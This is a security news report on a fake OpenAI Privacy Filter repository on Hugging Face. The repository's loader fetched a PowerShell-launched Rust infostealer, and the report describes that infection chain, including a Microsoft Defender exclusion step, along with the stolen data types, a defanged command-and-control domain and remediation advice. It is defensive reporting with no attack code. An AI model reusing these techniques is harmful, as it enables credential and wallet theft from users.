Fake OpenAI repository on Hugging Face pushes infostealer malware
Source: Bleeping Computer
Overview
A malicious Hugging Face repository that reached the platform’s trending list impersonated OpenAI’s Privacy Filter project to deliver information‑stealing malware to Windows users. The repository briefly hit #1 on Hugging Face and accumulated 244,000 downloads before the platform responded to reports and removed it.
Researchers at HiddenLayer, a company focused on safeguarding AI and ML models against attacks, discovered the campaign on May 7 after noticing a repository named Open-OSS/privacy-filter.
“The repository had typosquatted OpenAI’s legitimate Privacy Filter release, copied its model card nearly verbatim, and shipped a
loader.pyfile that fetches and executes infostealer malware on Windows machines,” the researchers explain in their full report.
Malicious Repository Details
The loader.py script included fake AI‑related code to appear harmless. In the background it:
- Disabled SSL verification.
- Decoded a Base64‑encoded URL pointing to an external resource.
- Fetched and executed a JSON payload containing a PowerShell command.
The PowerShell command runs in an invisible window, downloads a batch file (start.bat) that:
- Performs privilege escalation.
- Downloads the final payload (
sefirah). - Adds the payload to Microsoft Defender’s exclusions.
- Executes the payload.
Instructions from the malicious repository
Source: HiddenLayer
Payload and Capabilities
The final payload is a Rust‑based infostealer that targets the following data:
- Browser data from Chromium‑ and Gecko‑based browsers (cookies, saved passwords, encryption keys, browsing data, session tokens)
- Discord tokens, local databases, and master keys
- Cryptocurrency wallets and wallet browser extensions
- SSH, FTP, and VPN credentials and configuration files (including FileZilla)
- Sensitive local files and wallet seeds/keys
- System information
- Multi‑monitor screenshots
The stolen data is compressed and exfiltrated to a command‑and‑control server at recargapopular[.]com.
HiddenLayer highlights extensive anti‑analysis features, including checks for virtual machines, sandboxes, debuggers, and other analysis tools.
Distribution and Impact
- Downloads: 244,000 (likely inflated).
- Likes: 667 accounts liked the repository; most appear to be auto‑generated.
- Related activity: Researchers uncovered additional repositories using the same malicious loader infrastructure and noted overlaps with an npm typosquatting campaign distributing the WinOS 4.0 implant.
Mitigation Recommendations
Users who downloaded files from the malicious repository should:
- Reimage the affected machine.
- Rotate all stored credentials (passwords, API keys, tokens).
- Replace cryptocurrency wallets and seed phrases.
- Invalidate browser sessions and tokens.
- Review the system for any lingering malicious files or scheduled tasks.
Historical Abuse of Hugging Face
Threat actors have previously abused Hugging Face to host malicious models, despite the platform’s security measures.